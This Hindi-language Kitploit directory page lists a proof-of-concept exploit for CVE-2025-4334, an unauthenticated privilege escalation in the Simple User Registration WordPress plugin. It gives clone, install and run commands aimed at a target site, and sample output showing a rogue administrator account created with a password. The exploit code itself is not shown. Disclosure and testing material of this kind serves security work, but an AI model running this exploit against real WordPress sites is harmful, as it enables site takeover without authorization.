Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4334 — CVE-2025-4334 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, सिंपल यूज़र रजिस्ट्रेशन वर्डप्रेस प्लगइन (<= 6.3) में एक विशेषाधिकार वृद्धि भेद्यता, जो बिना प्रमाणीकरण के हमलावरों को व्यवस्थापक खाते बनाने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

CVE-2025-4334 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, सिंपल यूज़र रजिस्ट्रेशन वर्डप्रेस प्लगइन (<= 6.3) में एक विशेषाधिकार वृद्धि भेद्यता, जो बिना प्रमाणीकरण के हमलावरों को व्यवस्थापक खाते बनाने की अनुमति देती है।

रिपॉजिटरी देखें
4111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress लोगो

CVE-2025-4334 - सिंपल यूज़र रजिस्ट्रेशन <= 6.3 बिना प्रमाणीकरण के विशेषाधिकार वृद्धि

एक्सप्लॉइट शीर्षक: सिंपल यूज़र रजिस्ट्रेशन <= 6.3 – बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
लेखक: गौरव भट्टाचार्जी (0xgh057r3c0n)
CVE ID: CVE-2025-4334

यह एक्सप्लॉइट वर्डप्रेस के लिए सिंपल यूज़र रजिस्ट्रेशन प्लगइन (<= v6.3) में एक कमजोरी को लक्षित करता है, जो बिना प्रमाणीकृत हमलावरों को विशेषाधिकार बढ़ाने और एक नया व्यवस्थापक खाता बनाने की अनुमति देता है।


⚙️ स्थापना

रिपॉजिटरी को क्लोन करें और आवश्यक Python निर्भरताएँ स्थापित करें:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

निर्भरताएँ:

  • requests
  • colorama

🚀 उपयोग

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

तर्क:

  • -u / --url → बेस वर्डप्रेस URL (जैसे https://target.com/wordpress/)
  • --form → रजिस्ट्रेशन फॉर्म का पूरा URL (जैसे https://target.com/wpr/default-registration/)

उदाहरण:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 नमूना आउटपुट

root@kitploit:~
[*] फॉर्म विवरण प्राप्त किया जा रहा है...
[i] निकाला गया नॉन्स   : 1a2b3c4d5e
[i] निकाला गया फॉर्म ID : 12
[i] रेफरर पथ           : /wpr/default-registration/
[*] एक्सप्लॉइट पेलोड भेजा जा रहा है...
[i] HTTP प्रतिक्रिया कोड : 200
[i] सर्वर प्रतिक्रिया    : {"success":true,"user_id":2}

[+] एक्सप्लॉइट सफल हुआ
[+] उपयोगकर्ता नाम   : 0xgh057r3c0nadmin
[+] पहला नाम        : 0xgh057r3c0nadmin
[+] अंतिम नाम       : 0xgh057r3c0nadmin
[+] ईमेल            : [email protected]
[+] पासवर्ड         : Wiz007@8876@
[+] भूमिका          : administrator

एक्सप्लॉइट द्वारा : गौरव भट्टाचार्जी (0xgh057r3c0n)

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
अनधिकृत उपयोग या अनुमति के बिना सिस्टम के विरुद्ध उपयोग गैरकानूनी है।
लेखक किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।


📄 लाइसेंस

यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंसीकृत है।

टूल डाउनलोड करें